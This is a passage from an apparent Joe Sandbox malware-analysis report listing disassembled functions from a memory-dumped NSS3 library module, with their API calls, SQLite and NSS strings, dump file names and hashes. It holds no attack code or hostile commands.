SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C664E59

Part of subcall function 6C64FAB0: free.MOZGLUE(?,-00000001,?,?,6C5EF673,00000000,00000000), ref: 6C64FAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C72300C,00000000), ref: 6C664EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C664EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C664F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C66521A

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 82d32b778d419664eb344b7cbc8c9486144cf9f2b84814d2380c7fb90b908e52
Instruction ID: cf6c6f05aa8c774a796a2c217d6cb300934bbc3b6fd5dd2343bc35663dd02f51
Opcode Fuzzy Hash: 82d32b778d419664eb344b7cbc8c9486144cf9f2b84814d2380c7fb90b908e52
Instruction Fuzzy Hash: 8EF1BE71E00209CBDB04CF56D8507AEB7B2FF85318F254129D815ABB81EB75E981CF96

Function 6C5F4FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6C740148,?,6C606FEC), ref: 6C5F502A
PR_NewLock.NSS3(00000001,00000000,6C740148,?,6C606FEC), ref: 6C5F5034
PL_NewHashTable.NSS3(00000000,6C64FE80,6C64FD30,6C69C350,00000000,00000000,00000001,00000000,6C740148,?,6C606FEC), ref: 6C5F5055
PL_NewHashTable.NSS3(00000000,6C64FE80,6C64FD30,6C69C350,00000000,00000000,?,00000001,00000000,6C740148,?,6C606FEC), ref: 6C5F506D

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: 86dbbdda9256fb4140024a70632e5bac794c35de4b74946805bcf86981c6de74
Instruction ID: 6188e220fe5eab492f0c7dd4be536dd69732e71ef3c06f2a22a58db47a90f583
Opcode Fuzzy Hash: 86dbbdda9256fb4140024a70632e5bac794c35de4b74946805bcf86981c6de74
Instruction Fuzzy Hash: E931E5B2B022109BEB149E658C4CB473BBCAB1339CFE1C535EA2597640EB749845CFE5

Function 6C592E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C592F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C592FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C593005
memcpy.VCRUNTIME140(?,?,?), ref: 6C5930EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C593131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C593178

Strings

database corruption, xrefs: 6C59316C
%s at line %d of [%.10s], xrefs: 6C593171
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C593022, 6C593156, 6C593162, 6C59318A, 6C593196, 6C5931A2, 6C5931AE, 6C5931BA, 6C5931C6

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: a8ac80bd0d0594cef46a036b6de87b52fd4f1a4a3e6a9eb6c3378a95393a5c2f
Instruction ID: ce6a7d58e1b3e6d44fc88d5d19e14f4754ce4a21ddbb532730b9399c9af3967b
Opcode Fuzzy Hash: a8ac80bd0d0594cef46a036b6de87b52fd4f1a4a3e6a9eb6c3378a95393a5c2f
Instruction Fuzzy Hash: 68B1B0B0E05269DBCB08CF9DCD85AEEB7B1BF48304F1444A9E849B7B41D3759941CBA0

Function 6C5E2D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C5E2D69

Strings

winUnmapfile2, xrefs: 6C5E2F7F
winUnmapfile1, xrefs: 6C5E2F55
pl, xrefs: 6C5E2DD0
@pl, xrefs: 6C5E2E24
winTruncate1, xrefs: 6C5E2EBE
winSeekFile, xrefs: 6C5E2E9C
winTruncate2, xrefs: 6C5E2EF8
Ppl, xrefs: 6C5E2E74, 6C5E2EC5, 6C5E2F32, 6C5E2F5C

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: __allrem
String ID: @pl$Ppl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$pl
API String ID: 2933888876-2417264566
Opcode ID: 20e0c394bf94426e9cda2c0fcd58d1575f760c1914acb1cc0d8c6fd1751a588d
Instruction ID: 7b091b6357be08fa6d404c95f515091ea0571ce5a5e58cd54032aa79b53cfdb5
Opcode Fuzzy Hash: 20e0c394bf94426e9cda2c0fcd58d1575f760c1914acb1cc0d8c6fd1751a588d
Instruction Fuzzy Hash: 7E618171B002159FDB04DF68DC88A6A77B1FF4D324F208639E9199B790EB31AD16CB91

Function 6C572400 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6C5724EC
sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6C572315), ref: 6C57254F
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6C572315), ref: 6C57256C

Strings

bind on a busy prepared statement: [%s], xrefs: 6C5724E6
API called with finalized prepared statement, xrefs: 6C572543, 6C57254D
%s at line %d of [%.10s], xrefs: 6C572566
misuse, xrefs: 6C572561
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5724F4, 6C572557
API called with NULL prepared statement, xrefs: 6C57253C

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
API String ID: 632333372-2222229625
Opcode ID: 47af6f4ce9dc9f7c2efa0c989cdadd083d312471d251fc110f3be0d6b7694e61
Instruction ID: 82afcf04c932e3da6817b4993e1543b8ded26bef1c7fbb3208fce075ab919a14
Opcode Fuzzy Hash: 47af6f4ce9dc9f7c2efa0c989cdadd083d312471d251fc110f3be0d6b7694e61
Instruction Fuzzy Hash: FE41EC71604600CBE734CF29EC9CB6673B6AF81319F28493CE8494FB41DB36E89587A1

Function 6C64A470 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C64A4A6

Part of subcall function 6C650840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6508B4

PORT_Alloc_Util.NSS3(?), ref: 6C64A4EC

Part of subcall function 6C650BE0: malloc.MOZGLUE(6C648D2D,?,00000000,?), ref: 6C650BF8
Part of subcall function 6C650BE0: TlsGetValue.KERNEL32(6C648D2D,?,00000000,?), ref: 6C650C15

memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C64A527
memcmp.VCRUNTIME140(00000006,?,?), ref: 6C64A56D
memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C64A583
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C64A596
free.MOZGLUE(?), ref: 6C64A5A4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C64A5B6

Strings

^j`l, xrefs: 6C64A475

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
String ID: ^j`l
API String ID: 3906949479-1848618927
Opcode ID: ae3f499bd7454b0d9761d79606bc6d7a88cbce06d315f4c9074c0eb1025dfaa4
Instruction ID: 068c7e6de704f25f2ac8c54b19710991a475ce42a29d2a2ee6f355e5e78d1329
Opcode Fuzzy Hash: ae3f499bd7454b0d9761d79606bc6d7a88cbce06d315f4c9074c0eb1025dfaa4
Instruction Fuzzy Hash: B0412871A04242AFDB00DF59CD44B9ABBB2BF81308F18C478D85D5BB92E731E919C7A5

Function 6C5F0F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C5F0F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C5F0F84

Part of subcall function 6C64B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7218D0,?), ref: 6C64B095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C60F59B,6C71890C,?), ref: 6C5F0FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C5F0FC1

Part of subcall function 6C650BE0: malloc.MOZGLUE(6C648D2D,?,00000000,?), ref: 6C650BF8
Part of subcall function 6C650BE0: TlsGetValue.KERNEL32(6C648D2D,?,00000000,?), ref: 6C650C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C5F0FDB
PR_CallOnce.NSS3(6C752AA4,6C6512D0), ref: 6C5F0FEF
PL_FreeArenaPool.NSS3(?), ref: 6C5F1001
PL_FinishArenaPool.NSS3(?), ref: 6C5F1009

Strings

security, xrefs: 6C5F0F5C

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: 03d808a48eb530c6162367d2ef47a4a8ec7168d0c10ebdf4f29063e4df01d6e9
Instruction ID: 15ef74a3086ce5cd34b16d1a5e5cbe0bb164c3e75e3d30602e1127892fdc7b88
Opcode Fuzzy Hash: 03d808a48eb530c6162367d2ef47a4a8ec7168d0c10ebdf4f29063e4df01d6e9
Instruction Fuzzy Hash: A821F5B1904204ABEB009F24DD40EAFB7B8EF8565CF148519FC2897701FB31D956CB96

Function 6C5F6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C5F7D8F,6C5F7D8F,?,?), ref: 6C5F6DC8

Part of subcall function 6C64FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C64FE08
Part of subcall function 6C64FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C64FE1D
Part of subcall function 6C64FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C64FE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C5F7D8F,?,?), ref: 6C5F6DD5

Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C6510F3
Part of subcall function 6C6510C0: EnterCriticalSection.KERNEL32(?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65110C
Part of subcall function 6C6510C0: PL_ArenaAllocate.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651141
Part of subcall function 6C6510C0: PR_Unlock.NSS3(?,?,?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C651182
Part of subcall function 6C6510C0: TlsGetValue.KERNEL32(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C718FA0,00000000,?,?,?,?,6C5F7D8F,?,?), ref: 6C5F6DF7

Part of subcall function 6C64B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7218D0,?), ref: 6C64B095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C5F6E35

Part of subcall function 6C64FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C64FE29
Part of subcall function 6C64FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C64FE3D
Part of subcall function 6C64FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C64FE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C5F6E4C

Part of subcall function 6C6510C0: PL_ArenaAllocate.NSS3(?,6C5F8802,00000000,00000008,?,6C5EEF74,00000000), ref: 6C65116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C718FE0,00000000), ref: 6C5F6E82

Part of subcall function 6C5F6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C5FB21D,00000000,00000000,6C5FB219,?,6C5F6BFB,00000000,?,00000000,00000000,?,?,?,6C5FB21D), ref: 6C5F6B01
Part of subcall function 6C5F6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C5F6B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C5F6F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C5F6F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C718FE0,00000000), ref: 6C5F6F6B
PR_SetError.NSS3(FFFFE005,00000000,6C5F7D8F,?,?), ref: 6C5F6FE1

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 8e4d6fffe9c0eeb4f6e11502f7b5bdb76aae59e3797de9155dd22ac8548a3cc0
Instruction ID: 662be885aef98ec37d6a830438b9254f777fc947abd7f1962debff7f90162e82
Opcode Fuzzy Hash: 8e4d6fffe9c0eeb4f6e11502f7b5bdb76aae59e3797de9155dd22ac8548a3cc0
Instruction Fuzzy Hash: 6B71A071D107469BEB04CF15CD40BAABBA8BF95348F154229E818D7B11FB30EA95CF94

Function 6C630FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C631057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C631085
PK11_GetAllTokens.NSS3 ref: 6C6310B1
free.MOZGLUE(?), ref: 6C631107
PR_SetError.NSS3(00000000,00000000), ref: 6C631172
free.MOZGLUE(?), ref: 6C631182
free.MOZGLUE(?), ref: 6C6311A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C6311C5

Part of subcall function 6C6352C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C60EAC5,00000001), ref: 6C6352DF
Part of subcall function 6C6352C0: EnterCriticalSection.KERNEL32(?), ref: 6C6352F3
Part of subcall function 6C6352C0: PR_Unlock.NSS3(?), ref: 6C635358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C6311D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C6311F3

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: 97fc27a3a4cd5e8007460dc5970a8551c8208ac16d22528758f0f60dcb408a64
Instruction ID: 3e3b070adb6758eee899107eb1683ed33968c7dbc9983229369ca27d29a17724
Opcode Fuzzy Hash: 97fc27a3a4cd5e8007460dc5970a8551c8208ac16d22528758f0f60dcb408a64
Instruction Fuzzy Hash: BB61A2B0E003559BEB00DF64DC81BAAB7B4BF05348F146129EC1DAB741EB31E954CB99

Function 6C63ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C61CDBB,?,6C61D079,00000000,00000001), ref: 6C63AE10
EnterCriticalSection.KERNEL32(?,?,6C61CDBB,?,6C61D079,00000000,00000001), ref: 6C63AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C61D079,00000000,00000001), ref: 6C63AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C61CDBB,?,6C61D079,00000000,00000001), ref: 6C63AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C61CDBB,?,6C61D079,00000000,00000001), ref: 6C63AE7F
TlsGetValue.KERNEL32(?,6C61CDBB,?,6C61D079,00000000,00000001), ref: 6C63AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C61CDBB,?,6C61D079,00000000,00000001), ref: 6C63AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C61CDBB,?,6C61D079,00000000,00000001), ref: 6C63AEF1
free.MOZGLUE(6C61CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C61CDBB,?), ref: 6C63AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C61CDBB,?,6C61D079,00000000,00000001), ref: 6C63AF30

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 0716baab0acf82188a15c113b6a0bff21d98a4ef2041d732392ec05e7411b724
Instruction ID: 0ab122314511cac8eda0f4fa1a3449a7cd3b2427143b1af95d20ed4694fe6c14
Opcode Fuzzy Hash: 0716baab0acf82188a15c113b6a0bff21d98a4ef2041d732392ec05e7411b724
Instruction Fuzzy Hash: A551DDB1A00612AFDF00DF65C884B56B7B4FF09319F046669E80C87E52E731E868EBD5

Function 6C614CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C61AB7F,?,00000000,?), ref: 6C614CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C61AB7F,?,00000000,?), ref: 6C614CC8
TlsGetValue.KERNEL32(?,6C61AB7F,?,00000000,?), ref: 6C614CE0
EnterCriticalSection.KERNEL32(?,?,6C61AB7F,?,00000000,?), ref: 6C614CF4
PL_HashTableLookup.NSS3(?,?,?,6C61AB7F,?,00000000,?), ref: 6C614D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C614D10

Part of subcall function 6C69DD70: TlsGetValue.KERNEL32 ref: 6C69DD8C
Part of subcall function 6C69DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C69DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C614D26

Part of subcall function 6C6B9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C700A27), ref: 6C6B9DC6
Part of subcall function 6C6B9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C700A27), ref: 6C6B9DD1
Part of subcall function 6C6B9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6B9DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C614D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C614DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C614E02

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: dd0476796457e1479316af93a7ccd215689346cca41ab267d2d9b2c7797f3a8c
Instruction ID: e99f664e2c7bc401a00298244a5280262a994971be95e51c669c14fa01627795
Opcode Fuzzy Hash: dd0476796457e1479316af93a7ccd215689346cca41ab267d2d9b2c7797f3a8c
Instruction Fuzzy Hash: 1D4194B5E04205ABEB01AF28EC4096677F9AF0635EF044171EC0897B12EF71D919C7DA

Function 6C5F2E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C5F2CDA,?,00000000), ref: 6C5F2E1E

Part of subcall function 6C64FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C5F9003,?), ref: 6C64FD91
Part of subcall function 6C64FD80: PORT_Alloc_Util.NSS3(A4686C65,?), ref: 6C64FDA2
Part of subcall function 6C64FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C65,?,?), ref: 6C64FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C5F2E33

Part of subcall function 6C64FD80: free.MOZGLUE(00000000,?,?), ref: 6C64FDD1

TlsGetValue.KERNEL32 ref: 6C5F2E4E
EnterCriticalSection.KERNEL32(?), ref: 6C5F2E5E
PL_HashTableLookup.NSS3(?), ref: 6C5F2E71
